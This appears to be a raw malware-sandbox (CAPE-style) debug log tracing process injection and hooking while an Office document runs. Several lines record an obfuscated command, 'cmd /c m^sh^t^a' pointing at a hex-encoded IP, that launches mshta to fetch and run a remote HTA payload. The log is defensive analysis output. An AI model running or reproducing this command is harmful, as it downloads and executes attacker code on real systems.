2025-12-08 08:35:20,237 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCCEC0000: C:\Windows\SYSTEM32\srvcli (0x28000 bytes).
2025-12-08 08:35:20,237 [root] DEBUG: 6784: DLL loaded at 0x00007FFCD8000000: C:\Windows\SYSTEM32\netutils (0xc000 bytes).
2025-12-08 08:35:20,237 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCB6C0000: C:\Windows\SYSTEM32\urlmon (0x1f0000 bytes).
2025-12-08 08:35:20,237 [root] DEBUG: 6784: DLL loaded at 0x00007FFCAFED0000: C:\Windows\SYSTEM32\xpsservices (0x258000 bytes).
2025-12-08 08:35:20,237 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC6D40000: C:\Windows\SYSTEM32\XpsPushLayer (0x5b000 bytes).
2025-12-08 08:35:20,252 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,268 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCBDE0000: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140 (0x1b000 bytes).
2025-12-08 08:35:20,268 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC4A0000: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140_1 (0xc000 bytes).
2025-12-08 08:35:20,268 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC3D0000: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLMF (0x13000 bytes).
2025-12-08 08:35:20,284 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,284 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,299 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,315 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,346 [root] DEBUG: 6784: DLL loaded at 0x00007FFCB0E80000: C:\Windows\System32\jscript (0xd6000 bytes).
2025-12-08 08:35:20,346 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,393 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,393 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,424 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC3C0000: C:\Windows\system32\FontSub (0x23000 bytes).
2025-12-08 08:35:20,440 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,471 [root] DEBUG: 6784: DLL loaded at 0x00007FFCB0E80000: C:\Windows\System32\jscript (0xd6000 bytes).
2025-12-08 08:35:20,471 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,518 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC4A0000: C:\Windows\SYSTEM32\MSIMG32 (0x7000 bytes).
2025-12-08 08:35:20,518 [root] DEBUG: 6784: DLL loaded at 0x00007FFCDB0B0000: C:\Windows\System32\SHELL32 (0x85a000 bytes).
2025-12-08 08:35:20,518 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC53B0000: C:\Windows\system32\compstui (0x23000 bytes).
2025-12-08 08:35:20,534 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCD200000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.2506_none_270c5ae97388e100\comctl32 (0x293000 bytes).
2025-12-08 08:35:20,534 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,565 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,612 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC4A0000: C:\Windows\SYSTEM32\MSIMG32 (0x7000 bytes).
2025-12-08 08:35:20,612 [root] DEBUG: 6784: DLL loaded at 0x00007FFCDB0B0000: C:\Windows\System32\SHELL32 (0x85a000 bytes).
2025-12-08 08:35:20,612 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC53B0000: C:\Windows\system32\compstui (0x23000 bytes).
2025-12-08 08:35:20,612 [root] DEBUG: 6784: DLL loaded at 0x00007FFCCC090000: C:\Windows\SYSTEM32\amsi (0x1d000 bytes).
2025-12-08 08:35:20,659 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,674 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,674 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,690 [root] DEBUG: 6784: DLL loaded at 0x00007FFCC2080000: C:\Windows\System32\msxml6 (0x285000 bytes).
2025-12-08 08:35:20,706 [root] DEBUG: 6768: DLL loaded at 0x690F0000: C:\Windows\system32\directmanipulation (0x7f000 bytes).
2025-12-08 08:35:20,721 [root] DEBUG: 6768: api-rate-cap: NtQueryKey hook disabled due to rate
2025-12-08 08:35:20,752 [root] DEBUG: 6768: DLL loaded at 0x68F50000: C:\Windows\SYSTEM32\dcomp (0x19b000 bytes).
2025-12-08 08:35:20,799 [root] DEBUG: 6768: DLL loaded at 0x683A0000: C:\Program Files (x86)\Microsoft Office\root\Office16\chart (0xba7000 bytes).
2025-12-08 08:35:20,815 [root] DEBUG: 6768: DLL loaded at 0x68360000: C:\Windows\system32\mlang (0x35000 bytes).
2025-12-08 08:35:20,846 [root] DEBUG: 6768: CreateProcessHandler: Injection info set for new process 6760: C:\Windows\SYSTEM32\cmd.exe, ImageBase: 0x00990000
2025-12-08 08:35:20,846 [root] DEBUG: 844: CreateProcessHandler: Injection info set for new process 5720: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileCoAuth.exe, ImageBase: 0x0000000000220000
2025-12-08 08:35:20,862 [root] INFO: Announced 32-bit process name: cmd.exe pid: 6760
2025-12-08 08:35:20,862 [lib.api.process] INFO: Monitor config for <Process 6760 cmd.exe>: C:\tmp65phiig4\dll\6760.ini
2025-12-08 08:35:20,862 [root] INFO: Announced 32-bit process name: FileCoAuth.exe pid: 5720
2025-12-08 08:35:20,862 [lib.api.process] INFO: Monitor config for <Process 5720 FileCoAuth.exe>: C:\tmp65phiig4\dll\5720.ini
2025-12-08 08:35:20,862 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp65phiig4\dll\hcwYgGY.dll, loader C:\tmp65phiig4\bin\cyHVgjr.exe
2025-12-08 08:35:20,862 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp65phiig4\dll\hcwYgGY.dll, loader C:\tmp65phiig4\bin\cyHVgjr.exe
2025-12-08 08:35:20,877 [root] DEBUG: Loader: Injecting process 6760 (thread 5416) with C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:20,877 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:35:20,877 [root] DEBUG: Loader: Injecting process 5720 (thread 5888) with C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:20,877 [root] DEBUG: Successfully injected DLL C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:20,877 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:35:20,877 [root] DEBUG: Successfully injected DLL C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:20,877 [lib.api.process] INFO: Injected into 32-bit <Process 6760 cmd.exe>
2025-12-08 08:35:20,877 [lib.api.process] INFO: Injected into 32-bit <Process 5720 FileCoAuth.exe>
2025-12-08 08:35:20,877 [root] INFO: Announced 32-bit process name: FileCoAuth.exe pid: 5720
2025-12-08 08:35:20,877 [lib.api.process] INFO: Monitor config for <Process 5720 FileCoAuth.exe>: C:\tmp65phiig4\dll\5720.ini
2025-12-08 08:35:20,893 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp65phiig4\dll\hcwYgGY.dll, loader C:\tmp65phiig4\bin\cyHVgjr.exe
2025-12-08 08:35:20,909 [root] DEBUG: Loader: Injecting process 5720 (thread 5888) with C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:20,909 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:35:20,909 [root] DEBUG: Successfully injected DLL C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:20,909 [lib.api.process] INFO: Injected into 32-bit <Process 5720 FileCoAuth.exe>
2025-12-08 08:35:20,956 [root] DEBUG: 6768: hook_api: Warning - ScriptIsComplex export address 0x68341794 differs from GetProcAddress -> 0x76EB0E50 (gdi32full.dll::0x90e50)
2025-12-08 08:35:20,971 [root] DEBUG: 6768: DLL loaded at 0x68340000: C:\Windows\SYSTEM32\usp10 (0x17000 bytes).
2025-12-08 08:35:21,002 [root] DEBUG: 6768: DLL loaded at 0x681F0000: C:\Windows\System32\Windows.Globalization (0x14e000 bytes).
2025-12-08 08:35:21,034 [root] DEBUG: 6760: Python path set to 'C:\Python38'.
2025-12-08 08:35:21,034 [root] DEBUG: 6768: DLL loaded at 0x68010000: C:\Windows\SYSTEM32\globinputhost (0x22000 bytes).
2025-12-08 08:35:21,049 [root] DEBUG: 6760: Dropped file limit defaulting to 100.
2025-12-08 08:35:21,049 [root] DEBUG: 5720: Python path set to 'C:\Python38'.
2025-12-08 08:35:21,049 [root] DEBUG: 5720: Dropped file limit defaulting to 100.
2025-12-08 08:35:21,049 [root] INFO: Disabling sleep skipping.
2025-12-08 08:35:21,065 [root] DEBUG: 6760: YaraInit: Compiled rules loaded from existing file C:\tmp65phiig4\data\yara\capemon.yac
2025-12-08 08:35:21,065 [root] INFO: Disabling sleep skipping.
2025-12-08 08:35:21,065 [root] DEBUG: 6760: YaraScan: Scanning 0x00990000, size 0x5a55a
2025-12-08 08:35:21,065 [root] DEBUG: 6768: DLL loaded at 0x678F0000: C:\Windows\SYSTEM32\Bcp47Langs (0x49000 bytes).
2025-12-08 08:35:21,065 [root] DEBUG: 5720: YaraInit: Compiled rules loaded from existing file C:\tmp65phiig4\data\yara\capemon.yac
2025-12-08 08:35:21,065 [root] DEBUG: 6760: AmsiDumper initialised.
2025-12-08 08:35:21,065 [root] DEBUG: 5720: YaraScan: Scanning 0x00220000, size 0xcb190
2025-12-08 08:35:21,081 [root] DEBUG: 6760: Monitor initialised: 32-bit capemon loaded in process 6760 at 0x749a0000, thread 5416, image base 0x990000, stack from 0x2c63000-0x2d60000
2025-12-08 08:35:21,081 [root] DEBUG: 5720: AmsiDumper initialised.
2025-12-08 08:35:21,081 [root] DEBUG: 6760: Commandline: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
2025-12-08 08:35:21,096 [root] DEBUG: 5720: Monitor initialised: 32-bit capemon loaded in process 5720 at 0x749a0000, thread 5888, image base 0x220000, stack from 0x4f96000-0x4fa0000
2025-12-08 08:35:21,096 [root] DEBUG: 6760: GetAddressByYara: ModuleBase 0x77470000 FunctionName LdrpCallInitRoutine
2025-12-08 08:35:21,096 [root] DEBUG: 5720: Commandline: "C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileCoAuth.exe" -Embedding
2025-12-08 08:35:21,112 [root] DEBUG: 6760: hook_api: LdrpCallInitRoutine export address 0x774E66A0 obtained via GetFunctionAddress
2025-12-08 08:35:21,127 [root] DEBUG: 5720: GetAddressByYara: ModuleBase 0x77470000 FunctionName LdrpCallInitRoutine
2025-12-08 08:35:21,143 [root] DEBUG: 6760: hook_api: Warning - CreateRemoteThreadEx export address 0x76289A4C differs from GetProcAddress -> 0x76AEDDB0 (KERNELBASE.dll::0x11ddb0)
2025-12-08 08:35:21,143 [root] DEBUG: 5720: hook_api: LdrpCallInitRoutine export address 0x774E66A0 obtained via GetFunctionAddress
2025-12-08 08:35:21,143 [root] DEBUG: 6768: api-rate-cap: LdrGetProcedureAddressForCaller hook disabled due to rate
2025-12-08 08:35:21,143 [root] DEBUG: 6760: hook_api: Warning - CoCreateInstance export address 0x75730FEB differs from GetProcAddress -> 0x75F0FF70 (combase.dll::0xdff70)
2025-12-08 08:35:21,143 [root] DEBUG: 5720: hook_api: Warning - CreateRemoteThreadEx export address 0x76289A4C differs from GetProcAddress -> 0x76AEDDB0 (KERNELBASE.dll::0x11ddb0)
2025-12-08 08:35:21,143 [root] DEBUG: 6760: hook_api: Warning - CoCreateInstanceEx export address 0x7573102A differs from GetProcAddress -> 0x75F5CCF0 (combase.dll::0x12ccf0)
2025-12-08 08:35:21,143 [root] DEBUG: 5720: hook_api: Warning - CoCreateInstance export address 0x75730FEB differs from GetProcAddress -> 0x75F0FF70 (combase.dll::0xdff70)
2025-12-08 08:35:21,143 [root] DEBUG: 6760: hook_api: Warning - CoGetClassObject export address 0x757315BA differs from GetProcAddress -> 0x75ED2BD0 (combase.dll::0xa2bd0)
2025-12-08 08:35:21,143 [root] DEBUG: 5720: hook_api: Warning - CoCreateInstanceEx export address 0x7573102A differs from GetProcAddress -> 0x75F5CCF0 (combase.dll::0x12ccf0)
2025-12-08 08:35:21,159 [root] DEBUG: 6760: hook_api: Warning - UpdateProcThreadAttribute export address 0x762918BA differs from GetProcAddress -> 0x76B1BD10 (KERNELBASE.dll::0x14bd10)
2025-12-08 08:35:21,159 [root] DEBUG: 5720: hook_api: Warning - CoGetClassObject export address 0x757315BA differs from GetProcAddress -> 0x75ED2BD0 (combase.dll::0xa2bd0)
2025-12-08 08:35:21,174 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:35:21,174 [root] DEBUG: 5720: hook_api: Warning - UpdateProcThreadAttribute export address 0x762918BA differs from GetProcAddress -> 0x76B1BD10 (KERNELBASE.dll::0x14bd10)
2025-12-08 08:35:21,174 [root] DEBUG: 6768: DLL loaded at 0x67840000: C:\Program Files (x86)\Microsoft Office\root\Office16\osfshared (0xa5000 bytes).
2025-12-08 08:35:21,174 [root] DEBUG: 6760: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:35:21,174 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:35:21,174 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:35:21,190 [root] DEBUG: 5720: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:35:21,190 [root] DEBUG: 6760: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:35:21,206 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:35:21,206 [root] DEBUG: 6760: hook_api: Warning - CLSIDFromProgID export address 0x75730824 differs from GetProcAddress -> 0x75EA54C0 (combase.dll::0x754c0)
2025-12-08 08:35:21,206 [root] DEBUG: 5720: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:35:21,206 [root] DEBUG: 6760: hook_api: Warning - CLSIDFromProgIDEx export address 0x75730861 differs from GetProcAddress -> 0x75E9FF40 (combase.dll::0x6ff40)
2025-12-08 08:35:21,206 [root] DEBUG: 5720: hook_api: Warning - CLSIDFromProgID export address 0x75730824 differs from GetProcAddress -> 0x75EA54C0 (combase.dll::0x754c0)
2025-12-08 08:35:21,206 [root] DEBUG: 5720: hook_api: Warning - CLSIDFromProgIDEx export address 0x75730861 differs from GetProcAddress -> 0x75E9FF40 (combase.dll::0x6ff40)
2025-12-08 08:35:21,221 [root] DEBUG: 6760: Hooked 611 out of 613 functions
2025-12-08 08:35:21,221 [root] DEBUG: 5720: Hooked 611 out of 613 functions
2025-12-08 08:35:21,221 [root] DEBUG: 6768: DLL loaded at 0x674F0000: C:\Windows\SYSTEM32\UIAutomationCore (0x34c000 bytes).
2025-12-08 08:35:21,237 [root] DEBUG: 6760: Syscall hook installed, syscall logging level 1
2025-12-08 08:35:21,237 [root] DEBUG: 5720: Syscall hook installed, syscall logging level 1
2025-12-08 08:35:21,252 [root] DEBUG: 6760: WoW64fix: Windows version 10.0 not supported.
2025-12-08 08:35:21,252 [root] DEBUG: 5720: WoW64fix: Windows version 10.0 not supported.
2025-12-08 08:35:21,252 [root] INFO: Loaded monitor into process with pid 6760
2025-12-08 08:35:21,252 [root] DEBUG: 6768: DLL loaded at 0x672D0000: C:\Windows\System32\msxml6 (0x1e4000 bytes).
2025-12-08 08:35:21,252 [root] DEBUG: 6760: caller_dispatch: Added region at 0x00990000 to tracked regions list (ntdll::memcpy returns to 0x009ABB7E, thread 5416).
2025-12-08 08:35:21,268 [root] INFO: Loaded monitor into process with pid 5720
2025-12-08 08:35:21,268 [root] DEBUG: 6760: YaraScan: Scanning 0x00990000, size 0x5a55a
2025-12-08 08:35:21,268 [root] DEBUG: 5720: YaraScan: Scanning 0x68040000, size 0x14b06
2025-12-08 08:35:21,268 [root] DEBUG: 6760: ProcessImageBase: Main module image at 0x00990000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:35:21,268 [root] DEBUG: 5720: caller_dispatch: Added region at 0x68040000 to tracked regions list (ntdll::LdrLoadDll returns to 0x6804824F, thread 5888).
2025-12-08 08:35:21,268 [root] DEBUG: 6768: DLL loaded at 0x67260000: C:\Windows\SYSTEM32\PhotoMetadataHandler (0x69000 bytes).
2025-12-08 08:35:21,268 [root] DEBUG: 5720: caller_dispatch: Scanning calling region at 0x68040000...
2025-12-08 08:35:21,268 [root] DEBUG: 5720: ProcessTrackedRegion: Region at 0x68040000 mapped as \Device\HarddiskVolume2\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\vcruntime140.dll, skipping
2025-12-08 08:35:21,284 [root] DEBUG: 5720: YaraScan: Scanning 0x68060000, size 0x6c73e
2025-12-08 08:35:21,284 [root] DEBUG: 6760: InstrumentationCallback: Added region at 0x769D0000 to tracked regions list (thread 5416).
2025-12-08 08:35:21,284 [root] DEBUG: 5720: YaraScan: Scanning 0x68150000, size 0x91e24
2025-12-08 08:35:21,299 [root] DEBUG: 5720: YaraScan: Scanning 0x68150000, size 0x91e24
2025-12-08 08:35:21,299 [root] DEBUG: 5720: YaraScan: Scanning 0x68150000, size 0x91e24
2025-12-08 08:35:21,299 [root] DEBUG: 5720: caller_dispatch: Added region at 0x68060000 to tracked regions list (ntdll::LdrLoadDll returns to 0x6808BD1E, thread 5888).
2025-12-08 08:35:21,315 [root] DEBUG: 6760: CreateProcessHandler: Injection info set for new process 6460: C:\Windows\system32\mshta.exe, ImageBase: 0x001E0000
2025-12-08 08:35:21,315 [root] DEBUG: 5720: caller_dispatch: Scanning calling region at 0x68060000...
2025-12-08 08:35:21,315 [root] INFO: Announced 32-bit process name: mshta.exe pid: 6460
2025-12-08 08:35:21,315 [lib.api.process] INFO: Monitor config for <Process 6460 mshta.exe>: C:\tmp65phiig4\dll\6460.ini
2025-12-08 08:35:21,315 [root] DEBUG: 5720: ProcessTrackedRegion: Region at 0x68060000 mapped as \Device\HarddiskVolume2\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\msvcp140.dll, skipping
2025-12-08 08:35:21,315 [root] DEBUG: 6768: DLL loaded at 0x66EA0000: C:\Windows\SYSTEM32\d3dcompiler_47 (0x3b3000 bytes).
2025-12-08 08:35:21,331 [root] DEBUG: 5720: DLL loaded at 0x75540000: C:\Windows\System32\bcryptPrimitives (0x62000 bytes).
2025-12-08 08:35:21,331 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp65phiig4\dll\hcwYgGY.dll, loader C:\tmp65phiig4\bin\cyHVgjr.exe
2025-12-08 08:35:21,346 [root] DEBUG: 5720: InstrumentationCallback: Added region at 0x769D0000 to tracked regions list (thread 5888).
2025-12-08 08:35:21,346 [root] DEBUG: 5720: YaraScan: Scanning 0x680D0000, size 0x759f4
2025-12-08 08:35:21,346 [root] DEBUG: 5720: YaraScan: Scanning 0x67A50000, size 0x14d4fc
2025-12-08 08:35:21,362 [root] DEBUG: 5720: YaraScan: Scanning 0x67A50000, size 0x14d4fc
2025-12-08 08:35:21,362 [root] DEBUG: Loader: Injecting process 6460 (thread 2652) with C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:21,362 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:35:21,362 [root] DEBUG: Successfully injected DLL C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:35:21,362 [lib.api.process] INFO: Injected into 32-bit <Process 6460 mshta.exe>
2025-12-08 08:35:21,362 [root] DEBUG: 5720: caller_dispatch: Added region at 0x67A50000 to tracked regions list (ntdll::LdrLoadDll returns to 0x67A5EC9B, thread 5888).
2025-12-08 08:35:21,362 [root] DEBUG: 5720: caller_dispatch: Scanning calling region at 0x67A50000...
2025-12-08 08:35:21,362 [root] DEBUG: 5720: ProcessTrackedRegion: Region at 0x67A50000 mapped as \Device\HarddiskVolume2\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\adal.dll, skipping
2025-12-08 08:35:21,362 [root] DEBUG: 5720: YaraScan: Scanning 0x679D0000, size 0x7e188
2025-12-08 08:35:21,377 [root] DEBUG: 5720: YaraScan: Scanning 0x67940000, size 0x80b22
2025-12-08 08:35:21,377 [root] DEBUG: 5720: YaraScan: Scanning 0x67BF0000, size 0x41ab94
2025-12-08 08:35:21,377 [root] DEBUG: 6460: Python path set to 'C:\Python38'.
2025-12-08 08:35:21,377 [root] DEBUG: 6460: Dropped file limit defaulting to 100.
2025-12-08 08:35:21,393 [root] INFO: Disabling sleep skipping.
2025-12-08 08:35:21,393 [root] DEBUG: 6460: YaraInit: Compiled rules loaded from existing file C:\tmp65phiig4\data\yara\capemon.yac
2025-12-08 08:35:21,393 [root] DEBUG: 6460: YaraScan: Scanning 0x001E0000, size 0x717e
2025-12-08 08:35:21,393 [root] DEBUG: 6460: AmsiDumper initialised.
2025-12-08 08:35:21,393 [root] DEBUG: 6460: Monitor initialised: 32-bit capemon loaded in process 6460 at 0x749a0000, thread 2652, image base 0x1e0000, stack from 0x23f6000-0x2400000
2025-12-08 08:35:21,393 [root] DEBUG: 6460: Commandline: mshta  http://0xb907d607/fer/fer.html
2025-12-08 08:35:21,393 [root] DEBUG: 6460: GetAddressByYara: ModuleBase 0x77470000 FunctionName LdrpCallInitRoutine
2025-12-08 08:35:21,409 [root] DEBUG: 5720: YaraScan: Scanning 0x67BF0000, size 0x41ab94
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: LdrpCallInitRoutine export address 0x774E66A0 obtained via GetFunctionAddress
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: Warning - CreateRemoteThreadEx export address 0x76289A4C differs from GetProcAddress -> 0x76AEDDB0 (KERNELBASE.dll::0x11ddb0)
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: Warning - CoCreateInstance export address 0x75730FEB differs from GetProcAddress -> 0x75F0FF70 (combase.dll::0xdff70)
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: Warning - CoCreateInstanceEx export address 0x7573102A differs from GetProcAddress -> 0x75F5CCF0 (combase.dll::0x12ccf0)
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: Warning - CoGetClassObject export address 0x757315BA differs from GetProcAddress -> 0x75ED2BD0 (combase.dll::0xa2bd0)
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: Warning - UpdateProcThreadAttribute export address 0x762918BA differs from GetProcAddress -> 0x76B1BD10 (KERNELBASE.dll::0x14bd10)
2025-12-08 08:35:21,409 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:35:21,409 [root] DEBUG: 6460: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:35:21,409 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:35:21,409 [root] DEBUG: 6460: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:35:21,409 [root] DEBUG: 6460: hook_api: Warning - CLSIDFromProgID export address 0x75730824 differs from GetProcAddress -> 0x75EA54C0 (combase.dll::0x754c0)
2025-12-08 08:35:21,425 [root] DEBUG: 6460: hook_api: Warning - CLSIDFromProgIDEx export address 0x75730861 differs from GetProcAddress -> 0x75E9FF40 (combase.dll::0x6ff40)
2025-12-08 08:35:21,425 [root] DEBUG: 6460: Hooked 611 out of 613 functions
2025-12-08 08:35:21,425 [root] DEBUG: 6460: Syscall hook installed, syscall logging level 1
2025-12-08 08:35:21,425 [root] DEBUG: 6460: WoW64fix: Windows version 10.0 not supported.
2025-12-08 08:35:21,425 [root] DEBUG: 5720: YaraScan: Scanning 0x67BF0000, size 0x41ab94
2025-12-08 08:35:21,425 [root] INFO: Loaded monitor into process with pid 6460
2025-12-08 08:35:21,425 [root] DEBUG: 6460: caller_dispatch: Added region at 0x001E0000 to tracked regions list (kernel32::SetUnhandledExceptionFilter returns to 0x001E1C3B, thread 2652).
2025-12-08 08:35:21,425 [root] DEBUG: 6460: YaraScan: Scanning 0x001E0000, size 0x717e
2025-12-08 08:35:21,425 [root] DEBUG: 6460: ProcessImageBase: Main module image at 0x001E0000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:35:21,425 [root] DEBUG: 6460: InstrumentationCallback: Added region at 0x769D0000 to tracked regions list (thread 2652).
2025-12-08 08:35:21,440 [root] DEBUG: 6460: DLL loaded at 0x66E50000: C:\Windows\System32\WLDP (0x44000 bytes).
2025-12-08 08:35:21,440 [root] DEBUG: 5720: caller_dispatch: Added region at 0x00220000 to tracked regions list (ntdll::memcpy returns to 0x00287BAC, thread 5888).
2025-12-08 08:35:21,440 [root] DEBUG: 5720: YaraScan: Scanning 0x00220000, size 0xcb190
2025-12-08 08:35:21,440 [root] DEBUG: 5720: ProcessImageBase: Main module image at 0x00220000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:35:21,440 [root] DEBUG: 5720: caller_dispatch: Added region at 0x68150000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x681A2B0C, thread 5888).
2025-12-08 08:35:21,440 [root] DEBUG: 5720: ProcessTrackedRegion: Region at 0x68150000 mapped as \Device\HarddiskVolume2\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\LoggingPlatform.dll, skipping
2025-12-08 08:35:21,455 [root] DEBUG: 5720: DLL loaded at 0x74770000: C:\Windows\SYSTEM32\CRYPTSP (0x15000 bytes).
2025-12-08 08:35:21,455 [root] DEBUG: 5720: DLL loaded at 0x74740000: C:\Windows\system32\rsaenh (0x30000 bytes).
2025-12-08 08:35:21,455 [root] DEBUG: 5720: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:35:21,471 [root] DEBUG: 5720: DLL loaded at 0x74C50000: C:\Windows\SYSTEM32\wintypes (0xc7000 bytes).
2025-12-08 08:35:21,471 [root] DEBUG: 5720: DLL loaded at 0x74020000: C:\Windows\SYSTEM32\windows.storage (0x6ec000 bytes).
2025-12-08 08:35:21,487 [root] DEBUG: 5720: DLL loaded at 0x76C50000: C:\Windows\System32\SHCORE (0xc1000 bytes).
2025-12-08 08:35:21,487 [root] DEBUG: 5720: DLL loaded at 0x73A00000: C:\Windows\SYSTEM32\profapi (0x1d000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 6460: DLL loaded at 0x738F0000: C:\Windows\SYSTEM32\powrprof (0x45000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 5720: DLL loaded at 0x750C0000: C:\Windows\SYSTEM32\IPHLPAPI (0x24000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 6460: DLL loaded at 0x6C4F0000: C:\Windows\System32\WINHTTP (0xdd000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 5720: DLL loaded at 0x659E0000: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\OneDriveTelemetryStable (0x1a2000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 6460: DLL loaded at 0x659C0000: C:\Windows\System32\wkscli (0x12000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 5720: DLL loaded at 0x65940000: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileSyncTelemetryExtensions (0x71000 bytes).
2025-12-08 08:35:21,518 [root] DEBUG: 6460: DLL loaded at 0x72D20000: C:\Windows\System32\netutils (0xb000 bytes).
2025-12-08 08:35:21,534 [root] DEBUG: 6460: DLL loaded at 0x76C50000: C:\Windows\System32\shcore (0xc1000 bytes).
2025-12-08 08:35:21,550 [root] DEBUG: 5720: set_hooks_by_export_directory: Hooked 0 out of 613 functions
2025-12-08 08:35:21,550 [root] DEBUG: 6460: DLL loaded at 0x65B90000: C:\Windows\System32\mshtml (0x130a000 bytes).
2025-12-08 08:35:21,550 [root] DEBUG: 5720: DLL loaded at 0x74F30000: C:\Windows\SYSTEM32\kernel.appcore (0x13000 bytes).
2025-12-08 08:35:21,550 [root] DEBUG: 6460: DLL loaded at 0x73110000: C:\Windows\System32\UMPDC (0xe000 bytes).
